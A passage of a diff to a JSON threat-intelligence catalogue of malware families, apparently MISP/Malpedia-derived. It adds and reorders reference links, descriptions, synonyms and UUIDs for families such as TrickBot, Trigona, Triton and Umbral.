"https://therecord.media/trickbot-gang-shuts-down-botnet-after-months-of-inactivity/", + "https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html", + "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", + "https://medium.com/walmartglobaltech/anchor-and-lazarus-together-again-24744e516607", + "https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://www.cyberbit.com/latest-trickbot-variant-has-new-tricks-up-its-sleeve/", + "https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/", + "https://www.justice.gov/opa/pr/multiple-foreign-nationals-charged-connection-trickbot-malware-and-conti-ransomware", + "https://www.microsoft.com/security/blog/2022/03/16/uncovering-trickbots-use-of-iot-devices-in-command-and-control-infrastructure/", + "https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6", + "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/", + "https://technical.nttsecurity.com/post/102fnog/targeted-trickbot-activity-drops-powerbrace-backdoor", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.secureworks.com/blog/trickbot-modifications-target-us-mobile-users", + "https://www.welivesecurity.com/wp-content/uploads/2021/02/ESET_Threat_Report_Q42020.pdf", + "https://www.proofpoint.com/us/blog/security-briefs/threat-actors-pair-tax-themed-lures-covid-19-healthcare-themes", + "https://threatresearch.ext.hp.com/detecting-a-stealthy-trickbot-campaign/", + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", + "https://www.joesecurity.org/blog/498839998833561473", + "https://www.youtube.com/watch?v=EyDiIAt__dI", + "https://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors", + "https://krebsonsecurity.com/2020/10/attacks-aimed-at-disrupting-the-trickbot-botnet/", + "https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot", + "https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/", + "http://www.secureworks.com/research/threat-profiles/gold-blackburn", + "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-2-loader", + "https://www.wired.co.uk/article/trickbot-malware-group-internal-messages", + "https://noticeofpleadings.com/trickbot/files/Complaint%20and%20Summons/2020-10-06%20Trickbot%201%20Complaint%20with%20exs.pdf", + "https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", + "https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/trickbot-botnet-ransomware-disruption", + "https://thedfirreport.com/2021/05/02/trickbot-brief-creds-and-beacons/", + "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf", + "https://blog.morphisec.com/trickbot-uses-a-new-windows-10-uac-bypass", + "https://public.intel471.com/blog/partners-in-crime-north-koreans-and-elite-russian-speaking-cybercriminals/", + "https://blog.cyberint.com/ryuk-crypto-ransomware", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/", + "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", + "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2", + "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", + "https://public.intel471.com/blog/trickbot-online-emotet-microsoft-cyber-command-disruption-attempts/", + "https://twitter.com/VK_Intel/status/1328578336021483522", + "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/", + "https://arcticwolf.com/resources/blog/karakurt-web", + "https://blog.trendmicro.com/trendlabs-security-intelligence/latest-trickbot-campaign-delivered-via-highly-obfuscated-js-file/", + "https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure", + "https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://www.mandiant.com/media/12596/download", + "https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/", + "https://www.youtube.com/watch?v=lTywPmZEU1A", + "https://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks", + "https://eclypsium.com/2020/12/03/trickbot-now-offers-trickboot-persist-brick-profit/", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf", + "https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/", + "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth", + "https://www.advanced-intel.com/post/trickbot-group-launches-test-module-alerting-on-fraud-activity", + "https://blog.malwarebytes.com/threat-intelligence/2021/11/trickbot-helps-emotet-come-back-from-the-dead/", + "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes", + "https://blog.fraudwatchinternational.com/malware/trickbot-malware-works", + "https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/", + "https://www.fortinet.com/blog/threat-research/global-malicious-spam-campaign-using-black-lives-matter-as-a-lure", + "https://www.kryptoslogic.com/blog/2021/02/trickbot-masrv-module/", + "https://www.cert.pl/en/news/single/detricking-trickbot-loader/", + "https://www.gosecure.net/blog/2021/12/03/trickbot-leverages-zoom-work-from-home-interview-malspam-heavens-gate-and-spamhaus/", + "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/", + "https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/", + "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/", + "https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf", + "https://unit42.paloaltonetworks.com/goodbye-mworm-hello-nworm-trickbot-updates-propagation-module/", + "https://securityaffairs.co/wordpress/128190/cyber-crime/conti-ransomware-takes-over-trickbot.html", + "https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/", + "https://intel471.com/blog/a-brief-history-of-ta505", + "https://inquest.net/blog/2019/08/26/TrickBot-Memory-Analysis" ], "synonyms": [ "TheTrick", @@ -47975,12 +50227,14 @@ "value": "TrickBot" }, { - "description": "", + "description": "According to PCrisk, Trigona is ransomware that encrypts files and appends the \"._locked\" extension to filenames. Also, it drops the \"how_to_decrypt.hta\" file that opens a ransom note. An example of how Trigona renames files: it renames \"1.jpg\" to \"1.jpg._locked\", \"2.png\" to \"2.png._locked\", and so forth.\r\n\r\nIt embeds the encrypted decryption key, the campaign ID, and the victim ID in the encrypted files.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trigona", + "https://www.trendmicro.com/en_us/research/23/f/an-overview-of-the-trigona-ransomware.html", + "https://www.fortinet.com/blog/threat-research/ransomware-roundup-trigona-ransomware", "https://unit42.paloaltonetworks.com/trigona-ransomware-update/", - "https://www.fortinet.com/blog/threat-research/ransomware-roundup-trigona-ransomware" + "https://asec.ahnlab.com/en/51343/" ], "synonyms": [], "type": [] @@ -47993,25 +50247,25 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.triton", - "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf", - "https://www.eenews.net/stories/1060123327/", - "https://dragos.com/blog/trisis/TRISIS-01.pdf", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a", - "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security", - "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html", - "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1538425180.pdf", - "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", - "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html", - "https://www.nozominetworks.com//downloads/US/Nozomi-Networks-TRITON-The-First-SIS-Cyberattack.pdf", - "https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics", - "https://www.ic3.gov/Media/News/2022/220325.pdf", - "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware", - "https://github.com/ICSrepo/TRISIS-TRITON-HATMAN", - "https://home.treasury.gov/news/press-releases/sm1162", - "https://securelist.com/apt-trends-report-q2-2019/91897/", - "https://us-cert.cisa.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20A%29_S508C.PDF", "https://www.cisa.gov/uscert/ncas/alerts/aa22-083a", - "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf" + "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a", + "https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics", + "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security", + "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html", + "https://home.treasury.gov/news/press-releases/sm1162", + "https://github.com/ICSrepo/TRISIS-TRITON-HATMAN", + "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf", + "https://www.ic3.gov/Media/News/2022/220325.pdf", + "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1538425180.pdf", + "https://www.eenews.net/stories/1060123327/", + "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware", + "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html", + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://dragos.com/blog/trisis/TRISIS-01.pdf", + "https://www.nozominetworks.com//downloads/US/Nozomi-Networks-TRITON-The-First-SIS-Cyberattack.pdf", + "https://us-cert.cisa.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20A%29_S508C.PDF", + "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", + "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf" ], "synonyms": [ "HatMan", @@ -48027,20 +50281,20 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trochilus_rat", - "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia", - "https://github.com/5loyd/trochilus/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats", - "https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", - "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-vinewood", + "https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html", + "https://github.com/5loyd/trochilus/", + "https://github.com/m0n0ph1/malware-1/tree/master/Trochilus", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats", "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf", "https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://github.com/m0n0ph1/malware-1/tree/master/Trochilus", + "https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf", + "https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf", "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn", - "https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html", - "https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf" + "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf" ], "synonyms": [], "type": [] @@ -48053,16 +50307,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.troldesh", - "https://blog.avast.com/ransomware-strain-troldesh-spikes", - "https://www.zdnet.com/article/shade-troldesh-ransomware-shuts-down-and-releases-all-decryption-keys/", - "https://support.kaspersky.com/13059", "https://blogs.technet.microsoft.com/mmpc/2016/07/13/troldesh-ransomware-influenced-by-the-da-vinci-code/", - "https://labs.bitdefender.com/2020/05/shade-troldesh-ransomware-decryption-tool/", - "https://unit42.paloaltonetworks.com/shade-ransomware-hits-high-tech-wholesale-education-sectors-in-u-s-japan-india-thailand-canada/", - "https://blog.checkpoint.com/2015/06/01/troldesh-new-ransomware-from-russia/", - "https://isc.sans.edu/forums/diary/More+Russian+language+malspam+pushing+Shade+Troldesh+ransomware/24668/", - "https://securelist.com/the-shade-encryptor-a-double-threat/72087/", "https://github.com/shade-team/keys", + "https://blog.checkpoint.com/2015/06/01/troldesh-new-ransomware-from-russia/", + "https://support.kaspersky.com/13059", + "https://labs.bitdefender.com/2020/05/shade-troldesh-ransomware-decryption-tool/", + "https://isc.sans.edu/forums/diary/More+Russian+language+malspam+pushing+Shade+Troldesh+ransomware/24668/", + "https://blog.avast.com/ransomware-strain-troldesh-spikes", + "https://securelist.com/the-shade-encryptor-a-double-threat/72087/", + "https://unit42.paloaltonetworks.com/shade-ransomware-hits-high-tech-wholesale-education-sectors-in-u-s-japan-india-thailand-canada/", + "https://www.zdnet.com/article/shade-troldesh-ransomware-shuts-down-and-releases-all-decryption-keys/", "https://www.welivesecurity.com/2019/01/28/russia-hit-new-wave-ransomware-spam/" ], "synonyms": [ @@ -48137,13 +50391,13 @@ "value": "TUNNELFISH" }, { - "description": "", + "description": "According to Mitre, Turian is a backdoor that has been used by BackdoorDiplomacy to target Ministries of Foreign Affairs, telecommunication companies, and charities in Africa, Europe, the Middle East, and Asia. First reported in 2021, Turian is likely related to Quarian, an older backdoor that was last observed being used in 2013 against diplomatic targets in Syria and the United States. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.turian", + "https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/", "https://unit42.paloaltonetworks.com/playful-taurus/", - "https://www.fortinet.com/blog/threat-research/analysis-of-follina-zero-day", - "https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/" + "https://www.fortinet.com/blog/threat-research/analysis-of-follina-zero-day" ], "synonyms": [], "type": [] @@ -48169,13 +50423,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.turla_rpc", - "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", - "https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html", - "https://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html", - "https://unit42.paloaltonetworks.com/ironnetinjector/", - "https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html", "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf" + "https://unit42.paloaltonetworks.com/ironnetinjector/", + "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", + "https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html", + "https://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html" ], "synonyms": [], "type": [] @@ -48188,10 +50442,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.turla_silentmoon", - "https://twitter.com/Arkbird_SOLG/status/1304187749373800455", "https://www.emanueledelucia.net/the-bigboss-rules-something-about-one-of-the-uroburos-rpc-based-backdoors/", - "https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html", "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", + "https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html", + "https://twitter.com/Arkbird_SOLG/status/1304187749373800455", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf" ], "synonyms": [ @@ -48210,11 +50464,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.turnedup", - "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", - "https://www.cyberbit.com/new-early-bird-code-injection-technique-discovered/", "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", "https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/", - "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" + "https://www.cyberbit.com/new-early-bird-code-injection-technique-discovered/" ], "synonyms": [ "Notestuk" @@ -48303,8 +50557,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.uacme", - "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/", - "https://github.com/hfiref0x/UACME" + "https://github.com/hfiref0x/UACME", + "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/" ], "synonyms": [ "Akagi" @@ -48319,8 +50573,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.udpos", - "https://threatmatrix.cylance.com/en_us/home/threat-spotlight-inside-udpos-malware.html", - "https://www.forcepoint.com/blog/x-labs/udpos-exfiltrating-credit-card-data-dns" + "https://www.forcepoint.com/blog/x-labs/udpos-exfiltrating-credit-card-data-dns", + "https://threatmatrix.cylance.com/en_us/home/threat-spotlight-inside-udpos-malware.html" ], "synonyms": [], "type": [] @@ -48357,6 +50611,19 @@ "uuid": "5e362cd1-bc5c-4225-b820-00ec7ebebadd", "value": "Uiwix" }, + { + "description": "Umbral is a data-stealing Trojan that targets Windows systems. It spreads through phishing emails and malicious attachments. Once installed, Umbral can steal a variety of data, including usernames, passwords, online banking credentials, and confidential files. It can also change computer settings and execute harmful commands. Umbral is a serious security threat and should be removed immediately if found.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.umbral", + "https://blog.cyble.com/2023/06/23/trojanized-super-mario-game-installer-spreads-supremebot-malware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "449a8708-d0ec-40c8-af7c-ea6960d11659", + "value": "Umbral" + }, { "description": "", "meta": { @@ -48508,7 +50775,7 @@ "value": "Unidentified 029" }, { - "description": "", + "description": "According to enigmasoftware, FileCoder Trojans are Trojan infections that encrypt content on the victim's computer. FileCoder infections are a form of ransomware. Essentially, they take the victim's computer hostage, encrypting the victim's files and then demanding payment of a ransom in exchange for decrypting software", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_030", @@ -48672,8 +50939,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_058", - "https://securelist.com/the-evolution-of-brazilian-malware/74325/#rat", - "https://securelist.com/the-return-of-the-bom/90065/" + "https://securelist.com/the-return-of-the-bom/90065/", + "https://securelist.com/the-evolution-of-brazilian-malware/74325/#rat" ], "synonyms": [], "type": [] @@ -48691,7 +50958,7 @@ "type": [] }, "uuid": "969d1054-b917-4fb8-b3f8-1e33926fdb65", - "value": "Unidentified 061" + "value": "Unidentified 061 (Windows)" }, { "description": "This .net executable can receive commands from c2 sever, upload and download files according to the returned content, perform an uninstall, or modify the registry to achieve persistence across reboots. At the end, it downloads a Python-based RAT, called PeppyRAT.", @@ -48784,6 +51051,19 @@ "uuid": "f2979fee-603d-496e-a526-d622e9cba84f", "value": "Unidentified 072 (Metamorfo Loader)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_073", + "https://blog.certfa.com/posts/fake-interview-the-new-activity-of-charming-kitten/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f049e626-7de2-4648-81db-53dfd34f2fab", + "value": "Unidentified 073 (Charming Kitten)" + }, { "description": "", "meta": { @@ -48801,8 +51081,7 @@ "description": "Unpacked http_dll.dat from the blog post.", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_075", - "https://blog.vincss.net/2020/03/re012-phan-tich-ma-doc-loi-dung-dich-COVID-19-de-phat-tan-gia-mao-chi-thi-cua-thu-tuong-Nguyen-Xuan-Phuc.html" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_075" ], "synonyms": [], "type": [] @@ -48816,8 +51095,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_076", "https://www.youtube.com/watch?v=8x-pGlWpIYI", - "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html", - "https://www.zscaler.com/blogs/research/return-higaisa-apt" + "https://www.zscaler.com/blogs/research/return-higaisa-apt", + "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html" ], "synonyms": [], "type": [] @@ -48830,7 +51109,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_077", - "https://twitter.com/ccxsaber/status/1277064824434745345" + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048f", + "https://twitter.com/ccxsaber/status/1277064824434745345", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-north-korea-indictment" ], "synonyms": [], "type": [] @@ -48852,7 +51133,7 @@ "value": "Unidentified 078 (Zebrocy Nim Loader?)" }, { - "description": "This Trojan is a full-featured RAT capable of executing common tasks such as command execution and downloading/uploading files. This is implemented through a couple dozen C++ classes such as CMFile, CMFile, CMProcess, TFileDownload, TDrive, TProcessInfo, TSock, etc. The first stage custom installer utilizes the same classes. The Trojan uses HTTP Server API to filter HTTPS packets at port 443 and parse commands. \r\nIt is also used by attackers to gather a target’s data, make lateral movements and create SOCKS tunnels to their C2 using the Earthworm tunneler.Given that the Trojan is an HTTPS server itself, the SOCKS tunnel is used for targets without an external IP, so the C2 is able to send commands.", + "description": "This Trojan is a full-featured RAT capable of executing common tasks such as command execution and downloading/uploading files. This is implemented through a couple dozen C++ classes such as CMFile, CMFile, CMProcess, TFileDownload, TDrive, TProcessInfo, TSock, etc. The first stage custom installer utilizes the same classes. The Trojan uses HTTP Server API to filter HTTPS packets at port 443 and parse commands. \r\nIt is also used by attackers to gather a target\u2019s data, make lateral movements and create SOCKS tunnels to their C2 using the Earthworm tunneler.Given that the Trojan is an HTTPS server itself, the SOCKS tunnel is used for targets without an external IP, so the C2 is able to send commands.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_080", @@ -48933,9 +51214,7 @@ "description": "Downloader used in suspected APT attack against Vietnam.", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_089", - "https://kienmanowar.wordpress.com/2022/01/26/quicknote-analysis-of-malware-suspected-to-be-an-apt-attack-targeting-vietnam/", - "https://research.checkpoint.com/2023/pandas-with-a-soul-chinese-espionage-attacks-against-southeast-asian-government-entities/" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_089" ], "synonyms": [ "5.t Downloader" @@ -48949,9 +51228,7 @@ "description": "Recon/Loader malware attributed to Lazarus, disguised as Notepad++ shell extension.", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_090", - "https://cybergeeks.tech/a-detailed-analysis-of-lazarus-malware-disguised-as-notepad-shell-extension/", - "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_090" ], "synonyms": [], "type": [] @@ -49003,9 +51280,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_094", - "https://twitter.com/katechondic/status/1556940169483264000" + "https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html", + "https://twitter.com/katechondic/status/1556940169483264000", + "https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html", + "https://www.lac.co.jp/lacwatch/report/20221117_003189.html" + ], + "synonyms": [ + "ClaimLoader", + "PUBLOAD" ], - "synonyms": [], "type": [] }, "uuid": "db8f94e9-768d-4ad1-befb-55b4b820174f", @@ -49043,8 +51326,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_097", - "https://www.bleepingcomputer.com/news/security/hacking-group-polonium-uses-creepy-malware-against-israel/", - "https://www.welivesecurity.com/2022/10/11/polonium-targets-israel-creepy-malware/" + "https://www.welivesecurity.com/2022/10/11/polonium-targets-israel-creepy-malware/", + "https://www.bleepingcomputer.com/news/security/hacking-group-polonium-uses-creepy-malware-against-israel/" ], "synonyms": [], "type": [] @@ -49100,7 +51383,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_101", - "https://twitter.com/RedDrip7/status/1595365451495706624" + "https://twitter.com/RedDrip7/status/1595365451495706624", + "https://securelist.com/bluenoroff-methods-bypass-motw/108383/" ], "synonyms": [], "type": [] @@ -49109,12 +51393,10 @@ "value": "Unidentified 101 (Lazarus?)" }, { - "description": "", + "description": "Donot malware is a sophisticated, high-level malware toolkit designed to collect and exfiltrate information from vulnerable systems. It has been used in targeted attacks against government and military organizations in Asia. Donot malware is highly complex and well-crafted, and it poses a serious threat to information security.", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_102", - "https://labs.k7computing.com/index.php/the-donot-apt/", - "https://blog.morphisec.com/apt-c-35-new-windows-framework-revealed" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_102" ], "synonyms": [], "type": [] @@ -49127,14 +51409,110 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_103", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor", "https://otx.alienvault.com/pulse/61e7f74a936eea5d44026b8e" ], - "synonyms": [], + "synonyms": [ + "Sardonic" + ], "type": [] }, "uuid": "07106811-cd07-4d05-906d-c05208758b00", "value": "Unidentified 103 (FIN8)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_104", + "https://twitter.com/jaydinbas/status/1663916211975987201" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ec530093-5ffc-45f1-b04d-accf3269b2d2", + "value": "Unidentified 104" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_105", + "https://twitter.com/h2jazi/status/1681426768597778440" + ], + "synonyms": [], + "type": [] + }, + "uuid": "07464f74-f587-4266-b828-448c67d2bd85", + "value": "Unidentified 105" + }, + { + "description": "This is possibly related to the MATA framework / Dacls.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_106", + "https://www.virustotal.com/gui/file/3c1cfc2b8b7e5c2d713ec5f329aa58a6b56a08240199761ba6da91e719d30705/detection" + ], + "synonyms": [], + "type": [] + }, + "uuid": "da2d8044-ed12-4951-bcd8-fd1e1335244a", + "value": "Unidentified 106" + }, + { + "description": "Small shellcode downloader, likely used by APT29.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_107", + "https://lab52.io/blog/2344-2/", + "https://blog.eclecticiq.com/german-embassy-lure-likely-part-of-campaign-against-nato-aligned-ministries-of-foreign-affairs#a3", + 